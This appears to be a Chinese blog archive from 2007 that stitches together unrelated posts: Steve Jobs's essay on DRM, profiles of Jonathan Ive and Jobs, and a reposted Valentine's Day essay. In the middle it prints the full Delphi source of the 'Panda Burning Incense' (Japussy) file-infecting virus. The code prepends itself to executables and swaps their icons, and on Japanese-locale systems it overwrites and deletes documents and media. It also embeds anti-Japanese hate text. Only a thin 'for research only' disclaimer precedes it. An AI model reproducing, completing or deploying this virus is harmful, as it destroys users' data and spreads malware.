Sit on Apple's Dock
break the wall or bring the war
Steve Jobs February 6, 2007 With the stunning global success of Apple’s iPod music player and iTunes online music store, some have called for Apple to “open” the digital rights management (DRM) system that Apple uses to protect its music against theft, so that music purchased from iTunes can be played on digital devices purchased from other companies, and protected music purchased from other online music stores can play on iPods. Let’s examine the current situation and how we got here, then look at three possible alternatives for the future. To begin, it is useful to remember that all iPods play music that is free of any DRM and encoded in “open” licensable formats such as MP3 and AAC. iPod users can and do acquire their music from many sources, including CDs they own. Music on CDs can be easily imported into the freely-downloadable iTunes jukebox software which runs on both Macs and Windows PCs, and is automatically encoded into the open AAC or MP3 formats without any DRM. This music can be played on iPods or any other music players that play these open formats. The rub comes from the music Apple sells on its online iTunes Store. Since Apple does not own or control any music itself, it must license the rights to distribute music from others, primarily the “big four” music companies: Universal, Sony BMG, Warner and EMI. These four companies control the distribution of over 70% of the world’s music. When Apple approached these companies to license their music to distribute legally over the Internet, they were extremely cautious and required Apple to protect their music from being illegally copied. The solution was to create a DRM system, which envelopes each song purchased from the iTunes store in special and secret software so that it cannot be played on unauthorized devices. Apple was able to negotiate landmark usage rights at the time, which include allowing users to play their DRM protected music on up to 5 computers and on an unlimited number of iPods. Obtaining such rights from the music companies was unprecedented at the time, and even today is unmatched by most other digital music services. However, a key provision of our agreements with the music companies is that if our DRM system is compromised and their music becomes playable on unauthorized devices, we have only a small number of weeks to fix the problem or they can withdraw their entire music catalog from our iTunes store. To prevent illegal copies, DRM systems must allow only authorized devices to play the protected music. If a copy of a DRM protected song is posted on the Internet, it should not be able to play on a downloader’s computer or portable music device. To achieve this, a DRM system employs secrets. There is no theory of protecting content other than keeping secrets. In other words, even if one uses the most sophisticated cryptographic locks to protect the actual music, one must still “hide” the keys which unlock the music on the user’s computer or portable music player. No one has ever implemented a DRM system that does not depend on such secrets for its operation. The problem, of course, is that there are many smart people in the world, some with a lot of time on their hands, who love to discover such secrets and publish a way for everyone to get free (and stolen) music. They are often successful in doing just that, so any company trying to protect content using a DRM must frequently update it with new and harder to discover secrets. It is a cat-and-mouse game. Apple’s DRM system is called FairPlay. While we have had a few breaches in FairPlay, we have been able to successfully repair them through updating the iTunes store software, the iTunes jukebox software and software in the iPods themselves. So far we have met our commitments to the music companies to protect their music, and we have given users the most liberal usage rights available in the industry for legally downloaded music. With this background, let’s now explore three different alternatives for the future. The first alternative is to continue on the current course, with each manufacturer competing freely with their own “top to bottom” proprietary systems for selling, playing and protecting music. It is a very competitive market, with major global companies making large investments to develop new music players and online music stores. Apple, Microsoft and Sony all compete with proprietary systems. Music purchased from Microsoft’s Zune store will only play on Zune players; music purchased from Sony’s Connect store will only play on Sony’s players; and music purchased from Apple’s iTunes store will only play on iPods. This is the current state of affairs in the industry, and customers are being well served with a continuing stream of innovative products and a wide variety of choices. Some have argued that once a consumer purchases a body of music from one of the proprietary music stores, they are forever locked into only using music players from that one company. Or, if they buy a specific player, they are locked into buying music only from that company’s music store. Is this true? Let’s look at the data for iPods and the iTunes store – they are the industry’s most popular products and we have accurate data for them. Through the end of 2006, customers purchased a total of 90 million iPods and 2 billion songs from the iTunes store. On average, that’s 22 songs purchased from the iTunes store for each iPod ever sold. Today’s most popular iPod holds 1000 songs, and research tells us that the average iPod is nearly full. This means that only 22 out of 1000 songs, or under 3% of the music on the average iPod, is purchased from the iTunes store and protected with a DRM. The remaining 97% of the music is unprotected and playable on any player that can play the open formats. Its hard to believe that just 3% of the music on the average iPod is enough to lock users into buying only iPods in the future. And since 97% of the music on the average iPod was not purchased from the iTunes store, iPod users are clearly not locked into the iTunes store to acquire their music. The second alternative is for Apple to license its FairPlay DRM technology to current and future competitors with the goal of achieving interoperability between different company’s players and music stores. On the surface, this seems like a good idea since it might offer customers increased choice now and in the future. And Apple might benefit by charging a small licensing fee for its FairPlay DRM. However, when we look a bit deeper, problems begin to emerge. The most serious problem is that licensing a DRM involves disclosing some of its secrets to many people in many companies, and history tells us that inevitably these secrets will leak. The Internet has made such leaks far more damaging, since a single leak can be spread worldwide in less than a minute. Such leaks can rapidly result in software programs available as free downloads on the Internet which will disable the DRM protection so that formerly protected songs can be played on unauthorized players. An equally serious problem is how to quickly repair the damage caused by such a leak. A successful repair will likely involve enhancing the music store software, the music jukebox software, and the software in the players with new secrets, then transferring this updated software into the tens (or hundreds) of millions of Macs, Windows PCs and players already in use. This must all be done quickly and in a very coordinated way. Such an undertaking is very difficult when just one company controls all of the pieces. It is near impossible if multiple companies control separate pieces of the puzzle, and all of them must quickly act in concert to repair the damage from a leak. Apple has concluded that if it licenses FairPlay to others, it can no longer guarantee to protect the music it licenses from the big four music companies. Perhaps this same conclusion contributed to Microsoft’s recent decision to switch their emphasis from an “open” model of licensing their DRM to others to a “closed” model of offering a proprietary music store, proprietary jukebox software and proprietary players. The third alternative is to abolish DRMs entirely. Imagine a world where every online store sells DRM-free music encoded in open licensable formats. In such a world, any player can play music purchased from any store, and any store can sell music which is playable on all players. This is clearly the best alternative for consumers, and Apple would embrace it in a heartbeat. If the big four music companies would license Apple their music without the requirement that it be protected with a DRM, we would switch to selling only DRM-free music on our iTunes store. Every iPod ever made will play this DRM-free music. Why would the big four music companies agree to let Apple and others distribute their music without using DRM systems to protect it? The simplest answer is because DRMs haven’t worked, and may never work, to halt music piracy. Though the big four music companies require that all their music sold online be protected with DRMs, these same music companies continue to sell billions of CDs a year which contain completely unprotected music. That’s right! No DRM system was ever developed for the CD, so all the music distributed on CDs can be easily uploaded to the Internet, then (illegally) downloaded and played on any computer or player. In 2006, under 2 billion DRM-protected songs were sold worldwide by online stores, while over 20 billion songs were sold completely DRM-free and unprotected on CDs by the music companies themselves. The music companies sell the vast majority of their music DRM-free, and show no signs of changing this behavior, since the overwhelming majority of their revenues depend on selling CDs which must play in CD players that support no DRM system. So if the music companies are selling over 90 percent of their music DRM-free, what benefits do they get from selling the remaining small percentage of their music encumbered with a DRM system? There appear to be none. If anything, the technical expertise and overhead required to create, operate and update a DRM system has limited the number of participants selling DRM protected music. If such requirements were removed, the music industry might experience an influx of new companies willing to invest in innovative new stores and players. This can only be seen as a positive by the music companies. Much of the concern over DRM systems has arisen in European countries. Perhaps those unhappy with the current situation should redirect their energies towards persuading the music companies to sell their music DRM-free. For Europeans, two and a half of the big four music companies are located right in their backyard. The largest, Universal, is 100% owned by Vivendi, a French company. EMI is a British company, and Sony BMG is 50% owned by Bertelsmann, a German company. Convincing them to license their music to Apple and others DRM-free will create a truly interoperable music marketplace. Apple will embrace this wholeheartedly.
[引]:随着Macworld的结束,iPhone成了苹民的口头禅,当Jobs把各种眩目的功能玩弄于股掌之上时,苹果仿佛正在谱写一个绮丽缤纷的电信神话,然而,谁才是这神话幕后的真正缔造者? Jonathan Ive,一个苹果永远不会忘记的名字,一个时代神话的缔造者。 生活对于他来说过于完美,一个历史学家的妻子和双胞胎孩子让人羡慕不已,事业也显得格外顺利,20年前,英格兰皇家艺术学会的位置成为了他人生的转折点。 正如很多天才的故事一样,Jonathan Ive在幼年时便与众不同:Jonathan Ive出生于伦敦的一个中产家庭,十几岁的时就沉迷于造物的神秘中。1985年 Ive 被纽卡斯尔艺术学校(Newcastle Polytechnic)的设计系录取,他的天赋很快就显现出来。在设计顾问公司 Roberts Weaver Group 实习期间,他设计了一支在顶端有圆球和夹子的笔,那种装置除了消遣别无它用。“ 这种笔立刻成为拥有者的最爱,因为你会一直想玩它。” 等到毕业的时候,Ive 已经是英国设计圈里的传奇。Grinyer 造访过 Ive 位于纽卡斯尔 Gateshead 区的公寓一次,惊讶的发现屋子里挂满了他毕业设计的泡沫模型,那是一个能使老师更好地与有听力障碍的孩子交流的微型话筒与助听器的结合体(不出所料,使用的是白色的塑料)。 我们很难能把这样一个寡言少语的秃头男人和苹果公司的闪光的高层职位联系在一起,当Ive重新翻出布满灰尘的简历后,独具慧眼的 Jobs 意识到他已经找到了他想要的人。 想通过Jobs的变态面试也是并非轻而易举的,他曾经要求设计新 Mac 的设计师不准出现一个可见的螺丝钉。结果这个设计师做出来的模型上有一个藏在把手下不易被发现的螺丝钉,于是Jobs解雇了他。 两个人一拍即合,在今后的时间里,共同创造出许多伟大的产品,一切始于第一台半透明蓝色iMac,在经历了巨大的成功之后,灵感便像喷泉一样涌现出来:iMac,Mac mini,iPod,以及今天的iPhone iPhone的出现有些让人意外,因为这和原来的Mac风格有些区别,iPhone同样出自Ive的苹果团队! Ive 团队中的大部人住在旧金山,传言他们的起薪是20万美元左右,高出行业平均水平50%。他们在一个大的开放工作室中一起工作,但是拥有私人空间和绝对的隐私。普通的苹果员工不准进入,因为怕他们瞥见即将却尚未推出的产品,这也是iPhone大会之前根本没有人知道造型的根本原因! Ive 将他的设计资金投入到艺术品般的模型上,而不是用来召集一大群人。他的设计流程高度重复——制造一个又一个的模型以将新的理念具象化。也只有 Apple 的主设计 Jonathan Ive 才能够把科技玩意雕琢得根艺术品一样。按照 Jobs 的说法,这款叫做 iPhone 的小家伙将是一个革命,它是 Touchscreen iPod + Phone + Internet Communicater 的混合体。 iPhone的设计同样来自Jonathan Ive的那颗奇异的大脑,在日以继夜的工作努力下,在苹果技术员工的支持下,终于实现了艺术和技术的完美结合,一个崭新的时代到来了! 正是Jonathan Ive让苹果的不败神话持续至今,对于他很多业内知名人世都给予了极高的评价!我想这也是对他的最大的褒奖吧! [注]:2007年苹果大会Macworld上,Jobs用iPhone打的第一个电话就是打给台下的Jonathan Ive! Jonathan Ive个人简历: 1967年出生于英国,在纽卡斯尔综合性工程技术学院(Newcastle Polytechnic)学习工业设计; 1992年加入苹果,是iPod和iMac的设计者。现在,他已经是苹果工业设计部门的副总监; 2003年,他被伦敦设计博物馆评选为年度最佳设计师,同时还保持着皇家人文学会(Royal Society of Arts)的皇家工业设计师( Royal Designer for Industry )称号; 2006年,苹果公司首席设计师Jonathan Ive在伦敦接受了英国女王的册封,获颁大英帝国司令勋章(Commander of the Order of the British Empire,CBE)。 “我认为 Steve Jobs 找到了一个不仅懂得如何完成,甚至能超越的他的设想的人,并且是一次又一次的做到。”——Pearlman 原文出处:http://www.macx.cn/a/a4000I342653.mac
2006年10月,美国《计算机周刊》评出了IT界最伟大的十位精英人物,世界首富比尔·盖茨屈居第三,苹果CEO史蒂夫·乔布斯(Steve Jobs)勇夺桂冠。 生于1955年的乔布斯自小就受着硅谷的氛围的熏陶。那时候的硅谷,还远不是如今的高科技中心,不过它已经具备了孕育新科技的土壤。产生于硅谷的大部分神话都可以归功于车库。车库里,计算机爱好者们随意摆弄着零件,创造一切可能,乔布斯就是其中一员。第一台真正意义上的个人计算机,也就是第一代苹果机,便诞生于他父母的车库。 《环球企业家》称乔布斯为“全球最酷最特立独行的企业家、IT产业的艺术家、商界与文艺界的时尚先锋,以及黑客们不朽的偶像”。这一大串文字或许会得罪很多人,就连IT界最有话语权的比尔·盖茨也说:“这家伙太可怕了。”许多人深深地嫉妒乔布斯,比如甲骨文的CEO拉里·埃利森。 关于乔布斯的生平,我们知道的只是个大概,因为并没有一本权威传记的详细解说。 1972年,也就是乔布斯17岁的时候,他进入波特兰市的里德学院。6个月后,他退学。 1976年,他和另外两位伙伴共同创立了苹果公司。十年后,他败走麦城,被自己一手创立的公司扫地出门。 1985年,也就是被赶出苹果之后,他创立NeXT公司,企图制造“下一个”辉煌,可惜经历的却是价值一亿多美元的“下一个”滑铁卢。 1986年,他花费1000万美元收购Pixar(皮克斯),以便用电脑动画测试自己的电脑的制图效果如何,但十年来公司几乎毫无建树。 但命运更像是个偏爱传奇剧的导演。 1995年,一向将电脑动画制作视为副业的Pixar,凭借《海底总动员》,一举成为好莱坞的动画新贵,锋芒直逼迪斯尼。2006年,沃尔特·迪斯尼公司更是出资约70亿美元批准收购Pixar,乔布斯成为迪斯尼公司的最大个人股东。 1997年,苹果收购NeXT公司。因为甲骨文那个特别嫉妒乔布斯的埃里森在一边煽风点火,他说:“乔布斯是惟一能拯救苹果的人。”2000年,苹果将CEO宝座再次拱手奉上,乔布斯由此完成从创立到败走再到回归的蜕变。 2005年6月,著名学府斯坦福大学第114届的毕业典礼上,6个月就从大学退学的乔布斯受邀进行了如今广为传播的著名演讲。他坦言,那或许是他离大学最接近的时刻之一。 而苹果,与乔布斯更是千丝万缕,似乎有着无法割舍的神秘联系。乔布斯领导下的苹果似乎也对公众有着无法解释的神秘吸引力。正如乔布斯在接受《新闻周刊》的记者史蒂芬·利维的采访时,当问及用户从苹果音乐商店买的音乐只能在iTunes和iPod里放是否合理时,他回答说:“人们清楚地知道他们在iTunes商店买的音乐就应该在iPod上播放。”忠实的用户们仿佛就根本不曾考虑换一台机器、换一个系统。而苹果的竞争对手们,在谴责苹果时,也总是会提到那些狂热爱好者的“宗派主义”。无疑,乔布斯创造了一个“苹果教”,而他自任教主。 在有关乔布斯的那些五花八门的形容中,有两样是作者们总是乐此不疲地提及的,一个是创新,一个是完美主义。 创新正是乔布斯赋予苹果和之后的Pixar的赖以生存的根本。当然,也有人把这种创新归为命运的选择:“非技术出身、没有MBA文凭,甚至连大学都未毕业,除了选择创新,他还能做些什么?”这是《快速公司》杂志(Fast Company)的言论。 第一台真正意义上的个人计算机的诞生,或许应该称之为发明,但iMac电脑的诞生,却绝对应该称之为创新。首次实现了一体化,具有水果糖似的甜蜜体形、天空般的明蓝色彩、半透明的“纹理”以及温和触感的iMac,一时之间风靡全球。更重要的是,它让苹果走出了自1993年以来的亏损阴影。 而网上音乐商店iTunes,开放第一周就售出100万首歌曲。其所谓的竞争对手和前辈,环球与索尼合资的PressPlay,以及华纳、贝塔斯曼、百代和靠RealPlay发家的RealNetworks联手打造的MusicNet,开办一年多后的用户总数才只有22万。 iPod更是不用提了,滚轮式触摸屏几乎成了后辈们必定模仿的标志性设计,简单而实用的播放列表编辑则让用户们欣喜若狂。2005年6月的统计数据表明,它在数码音乐播放器市场的占有率达到76%,成了当之无愧的“21世纪的随身听”。它的存在几乎成了一种情感现象,超越了电子产品的范畴,成为一种符号、一个宠物以及身份的表征,甚至有人还给自己的iPod起一个特别的名字以示亲密。 不过,乔布斯口中的创新并不只是意味着研发出开创时代性的产品,同时还意味着这些产品能创造经济效应。“如果那些又新又酷的产品不能够为你带来可观利润,那不是创新,只是艺术。” 或许,这种创新精神正是来源于20世纪70年代乔布斯他们所创的家酿计算机俱乐部。传承下来的“黑客”精神在苹果的每一项发明中体现着,比如iPod、iMac、iMovie、iDVD、iTunes。尽管苹果每年只能开发出一到两款新产品,但几乎每款都能引起美国国内甚至世界的轰动。过去几年中,没有哪一个企业,获得过比苹果更多的、堪称工业设计领域“奥斯卡奖”的美国工业设计协会(IDSA)颁发的奖项。 如果说乔布斯的“错误就代表着新的机会”令人叹服,他对完美的追求有时却让人“厌烦”。 “再想一个除了‘iPod’以外的名字。”这是在iPod发布的几个星期以前,乔布斯在苹果的某次高层会议上下达的命令。作为一个唯美主义者,他对完美的不懈追求和对细节的近乎强迫地关注,促使他想要制造出一款绝对完美的产品。 在苹果公司,乔布斯用艺术来创造技术;对等的,在Pixar公司,他则用技术来创造艺术。乔布斯始终保持这样的基本理念:超一流的产品会带来超一流的利润。 乔布斯对人才的渴求和他的坏脾气同样值得一提。重回苹果之后,乔布斯的一大举措就是大规模吸纳技术天才,从1998年到2000年,3年内,苹果仅程序人员就招募了近1000名。但他的坏脾气也一样声名远扬。几乎不为人知的苹果创始人之一罗纳德·韦恩离开苹果的原因之一,就是因为过于理性的他无法忍受乔布斯的疯狂举动。1985年乔布斯被董事会炒鱿鱼也是因为当时的CEO约翰·斯高利无法忍受他的独断专行,以离职相要挟而造成的。 有些事或许还可以说明乔布斯的炙手可热。有太多人以他为主角进行创作,以至于苹果公司采取极端措施以示抗议。2004年,苹果公司曾撤掉自己的销售商店里所有John Wiley出版的技术图书,理由是,他们的作者杰弗里·扬(Jeffrey Young)将20年前的旧版本更新为iCon Steve Jobs,重新出版。 和苹果公司的另一位创始人沃兹涅克不同,由于没有一本权威的传记(前者于2006年出版了自己的个人传记iWoz: From Computer Geek to Cult Icon),我们只能从各个版本中零星了解乔布斯。当然,这或许也是因为乔布斯未来还有更多的精彩要创造,现在就盖棺定论为时过早。 于是乎,要了解不同时期的乔布斯或许就要看不同版本的传记。The Second Coming of Steve Jobs讲述的是1985年他被逼离开苹果到重登苹果CEO宝座这15年间的风风雨雨;早期的经历或许要从出版于1988年的Steve Jobs, The Journey is The Reward中找到更多的记录;而要想得到更客观的信息,Apple Confidential大概是个不错的选择。 不过,无论怎么选、怎么看,“史蒂夫将永远是史蒂夫,惟一可能的变化是他将不断失去更多的头发。”英特尔的前任CEO安迪·格鲁夫(Andy Grove),乔布斯多年的对手和朋友这样说。所以,我们完全有可能预见乔布斯的未来,那就是,苹果教主的头终将变成秃顶,变得像苹果一样光亮。
声明: 以下代码为网上收集,本人不保证其真实性。 调试以下代码存在数据风险,敬请留意。 以下代码仅供原理分析或参考研究,禁止用于非法用途。 如任何人由于以下代码的发布蒙受任何损失均不为本Space责任。 Leask Huang March 5, 2007 熊猫烧香源代码: program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 –8086 Japussy.exe } IconSize = $2E8; //PE文件主图标的大小–744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = ‘If a race need to be killed out, it must be Yamato. ‘ + ‘If a country need to be destroyed, it must be Japan! ‘ + ‘** W32.Japussy.Worm.A **’; {$R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external ‘Kernel32.dll’; //函数声明 var TmpFile: string; Si: STARTUPINFO; Pi: PROCESS_INFORMATION; IsJap: Boolean = False; //日文操作系统标记 { 判断是否为Win9x } function IsWin9x: Boolean; var Ver: TOSVersionInfo; begin Result := False; Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); if not GetVersionEx(Ver) then Exit; if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True; end; { 在流之间复制 } procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; dStartPos: Integer; Count: Integer); var sCurPos, dCurPos: Integer; begin sCurPos := Src.Position; dCurPos := Dst.Position; Src.Seek(sStartPos, 0); Dst.Seek(dStartPos, 0); Dst.CopyFrom(Src, Count); Src.Seek(sCurPos, 0); Dst.Seek(dCurPos, 0); end; { 将宿主文件从已感染的PE文件中分离出来,以备使用 } procedure ExtractFile(FileName: string); var sStream, dStream: TFileStream; begin try sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try dStream := TFileStream.Create(FileName, fmCreate); try sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 dStream.CopyFrom(sStream, sStream.Size - HeaderSize); finally dStream.Free; end; finally sStream.Free; end; except end; end; { 填充STARTUPINFO结构 } procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); begin Si.cb := SizeOf(Si); Si.lpReserved := nil; Si.lpDesktop := nil; Si.lpTitle := nil; Si.dwFlags := STARTF_USESHOWWINDOW; Si.wShowWindow := State; Si.cbReserved2 := 0; Si.lpReserved2 := nil; end; { 发带毒邮件 } procedure SendMail; begin //哪位仁兄愿意完成之? end; { 感染PE文件 } procedure InfectOneFile(FileName: string); var HdrStream, SrcStream: TFileStream; IcoStream, DstStream: TMemoryStream; iID: LongInt; aIcon: TIcon; Infected, IsPE: Boolean; i: Integer; Buf: array[0..1] of Char; begin try //出错则文件正在被使用,退出 if CompareText(FileName, ‘JAPUSSY.EXE’) = 0 then //是自己则不感染 Exit; Infected := False; IsPE := False; SrcStream := TFileStream.Create(FileName, fmOpenRead); try for i := 0 to $108 do //检查PE文件头 begin SrcStream.Seek(i, soFromBeginning); SrcStream.Read(Buf, 2); if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记 begin IsPE := True; //是PE文件 Break; end; end; SrcStream.Seek(-4, soFromEnd); //检查感染标记 SrcStream.Read(iID, 4); if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染 Infected := True; finally SrcStream.Free; end; if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 Exit; IcoStream := TMemoryStream.Create; DstStream := TMemoryStream.Create; try aIcon := TIcon.Create; try //得到被感染文件的主图标(744字节),存入流 aIcon.ReleaseHandle; aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0); aIcon.SaveToStream(IcoStream); finally aIcon.Free; end; SrcStream := TFileStream.Create(FileName, fmOpenRead); //头文件 HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); try //写入病毒体主图标之前的数据 CopyStream(HdrStream, 0, DstStream, 0, IconOffset); //写入目前程序的主图标 CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize); //写入病毒体主图标到病毒体尾部之间的数据 CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail); //写入宿主程序 CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size); //写入已感染的标记 DstStream.Seek(0, 2); iID := $44444444; DstStream.Write(iID, 4); finally HdrStream.Free; end; finally SrcStream.Free; IcoStream.Free; DstStream.SaveToFile(FileName); //替换宿主文件 DstStream.Free; end; except; end; end; { 将目标文件写入垃圾码后删除 } procedure SmashFile(FileName: string); var FileHandle: Integer; i, Size, Mass, Max, Len: Integer; begin try SetFileAttributes(PChar(FileName), 0); //去掉只读属性 FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件 try Size := GetFileSize(FileHandle, nil); //文件大小 i := 0; Randomize; Max := Random(15); //写入垃圾码的随机次数 if Max < 5 then Max := 5; Mass := Size div Max; //每个间隔块的大小 Len := Length(Catchword); while i < Max do begin FileSeek(FileHandle, i * Mass, 0); //定位 //写入垃圾码,将文件彻底破坏掉 FileWrite(FileHandle, Catchword, Len); Inc(i); end; finally FileClose(FileHandle); //关闭文件 end; DeleteFile(PChar(FileName)); //删除之 except end; end; { 获得可写的驱动器列 表 } function GetDrives: string; var DiskType: Word; D: Char; Str: string; i: Integer; begin for i := 0 to 25 do //遍历26个字母 begin D := Chr(i + 65); Str := D + ‘:’; DiskType := GetDriveType(PChar(Str)); //得到本地磁盘和网络盘 if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then Result := Result + D; end; end; { 遍历目录,感染和摧毁文件 } procedure LoopFiles(Path, Mask: string); var i, Count: Integer; Fn, Ext: string; SubDir: TStrings; SearchRec: TSearchRec; Msg: TMsg; function IsValidDir(SearchRec: TSearchRec): Integer; begin if (SearchRec.Attr <> 16) and (SearchRec.Name <> ‘.’) and (SearchRec.Name <> ‘..’) then Result := 0 //不是目录 else if (SearchRec.Attr = 16) and (SearchRec.Name <> ‘.’) and (SearchRec.Name <> ‘..’) then Result := 1 //不是根目录 else Result := 2; //是根目录 end; begin if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then begin repeat PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑 if IsValidDir(SearchRec) = 0 then begin Fn := Path + SearchRec.Name; Ext := UpperCase(ExtractFileExt(Fn)); if (Ext = ‘.EXE’) or (Ext = ‘.SCR’) then begin InfectOneFile(Fn); //感染可执行文件 end else if (Ext = ‘.HTM’) or (Ext = ‘.HTML’) or (Ext = ‘.ASP’) then begin //感染HTML和ASP文件,将Base64编码后的病毒写入 //感染浏览此网页的所有用户 //哪位大兄弟愿意完成之? end else if Ext = ‘.WAB’ then //Outlook地址簿文件 begin //获取Outlook邮件地址 end else if Ext = ‘.ADC’ then //Foxmail地址自动完成文件 begin //获取Foxmail邮件地址 end else if Ext = ‘IND’ then //Foxmail地址簿文件 begin //获取Foxmail邮件地址 end else begin if IsJap then //是倭文操作系统 begin if (Ext = ‘.DOC’) or (Ext = ‘.XLS’) or (Ext = ‘.MDB’) or (Ext = ‘.MP3’) or (Ext = ‘.RM’) or (Ext = ‘.RA’) or (Ext = ‘.WMA’) or (Ext = ‘.ZIP’) or (Ext = ‘.RAR’) or (Ext = ‘.MPEG’) or (Ext = ‘.ASF’) or (Ext = ‘.JPG’) or (Ext = ‘.JPEG’) or (Ext = ‘.GIF’) or (Ext = ‘.SWF’) or (Ext = ‘.PDF’) or (Ext = ‘.CHM’) or (Ext = ‘.AVI’) then SmashFile(Fn); //摧毁文件 end; end; end; //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑 Sleep(200); until (FindNext(SearchRec) <> 0); end; FindClose(SearchRec); SubDir := TStringList.Create; if (FindFirst(Path + ‘.’, faDirectory, SearchRec) = 0) then begin repeat if IsValidDir(SearchRec) = 1 then SubDir.Add(SearchRec.Name); until (FindNext(SearchRec) <> 0); end; FindClose(SearchRec); Count := SubDir.Count - 1; for i := 0 to Count do LoopFiles(Path + SubDir.Strings + ‘’, Mask); FreeAndNil(SubDir); end; { 遍历磁盘上所有的文件 } procedure InfectFiles; var DriverList: string; i, Len: Integer; begin if GetACP = 932 then //日文操作系统 IsJap := True; //去死吧! DriverList := GetDrives; //得到可写的磁盘列表 Len := Length(DriverList); while True do //死循环 begin for i := Len downto 1 do //遍历每个磁盘驱动器 LoopFiles(DriverList + ‘:’, ‘.’); //感染之 SendMail; //发带毒邮件 Sleep(1000 * 60 * 5); //睡眠5分钟 end; end; { 主程序开始 } begin if IsWin9x then //是Win9x RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 else //WinNT begin //远程线程映射到Explorer进程 //哪位兄台愿意完成之? end; //如果是原始病毒体自己 if CompareText(ExtractFileName(ParamStr(0)), ‘Japussy.exe’) = 0 then InfectFiles //感染和发邮件 else //已寄生于宿主程序上了,开始工作 begin TmpFile := ParamStr(0); //创建临时文件 Delete(TmpFile, Length(TmpFile) - 4, 4); TmpFile := TmpFile + #32 + ‘.exe’; //真正的宿主文件,多一个空格 ExtractFile(TmpFile); //分离之 FillStartupInfo(Si, SW_SHOWDEFAULT); CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, 0, nil, ‘.’, Si, Pi); //创建新进程运行之 InfectFiles; //感染和发邮件 end; end.
More Info: http://cn.engadget.com/2007/02/27/macbook-pro-takes-bullet-like-a-champ/
I’ll leave.
注意:本文引用自 闾丘露薇 的凤凰博客(http://blog.phoenixtv.com/user1/roseluqiu/) 中国人怎样过情人节,美国和欧洲的媒体都有报道,不过看到的是中国的高收入人士如何挥金如土,那些靠着几百块工资生活的人们,显得和这个节日毫无关系. 根据报道,上海今年的一家酒店推出28888一晚的套餐,烛光晚餐加上总统套房一夜.不过和去年188888的游轮浦江夜游比较的话,算不上什麽.而情人节对于一个28岁,月入八百元的环卫工人来说,她只关心,地上有多少的纸屑,就好像大多数被中国的经济繁荣抛在身后的中国人一样,她想的是,如何挣钱糊口. 这样的故事,对于我来说,已经不算新鲜,因为这些年,每年的情人节,从媒体上总是能够看到这样那样的报道,染了色的玫瑰花变成了200元一枝,动辄上千元的烛光晚餐已经供不应求,当然不会缺少这些天价情人节套餐,是如何如何地被中国人所追捧.当然你可以说,钱是大家自己赚的,如何花,当然是自己的事情.而且,这样的例子,毕竟只是少数.我也相信毕竟这只是少数,但是少数的例子,往往却会成为媒体报道的焦点,而且也会把公众的视线集中在这一点上,潜移默化中,成为人们设定的一个参照点,慢慢的,成为公众的价值观. 说到这一点,今天看到一篇关于美国”反情人节”的报道,越来越多的美国人,不单单是单身的,还有情侣和夫妻,觉得情人节带给它们经济和精神上的压力.相信很多中国人也会有同感.其实仔细想想,这种压力,很大程度上是外界给与的,别人得到礼物,自己没有,别人可以被邀请烛光晚餐,自己却没有,媒体和商家的联手宣传,让人觉得,不这样过情人节,是很不时尚,很没有品味,很孤单的事情.但是情人节的意义,难道就是这些吗? 第一次在美国过情人节.说实话,如果不是因为天天上中文网站,里面一个个情人节专辑的提醒,可能就会忘记这一天了.这些天只是在看电视的时候多了一些珠宝广告,打开今天的几份美国大报,找了好久,才找到一些相关的报道.不过,和传统意义上的情人节故事并不一样,比如讲述的是几个免费提供精子,帮助那些不孕夫妻的男性,在情人节这一天,希望透过媒体,和自己血缘上的,而不是法律上的孩子们,说一声”情人节快乐.” 这样的故事很让人感动,因为已经把情人节的意义从爱情拓展到了亲情.其实就在两个星期前,我所住的宿舍楼下贴出了一张告示,呼吁大家把没有用完的化妆品捐献出来,因为组织者准备在情人节这一天,把这些化妆品送给那些住在庇护所的无家可归的女性,让她们在情人节这一天,感受别人的关怀. 没有钱,就不送花,只送上一句心里话,可以不吃烛光晚餐,一起坐在家里煮一顿面条.每个人都可以用自己的方式来过情人节,只不过大家可以看到,富人的选择,要比穷人多很多.比如,情人节这一天,所有的玫瑰花,所有的餐厅都涨价,这样的话,穷人就没有了买花和吃饭的选择.当然,你可以跟我争论说,价格是由市场的供求决定的,你看看中国,价格如此之高,依然还是供不应求呢.如果这是事实,那末看来问题是在我们这些消费者的身上了.我们为什麽要在这一天,追捧这些明码实价的东西?来证明爱情吗?来炫耀自己的财富吗?来追求浪漫吗?来满足自己的虚荣心吗? 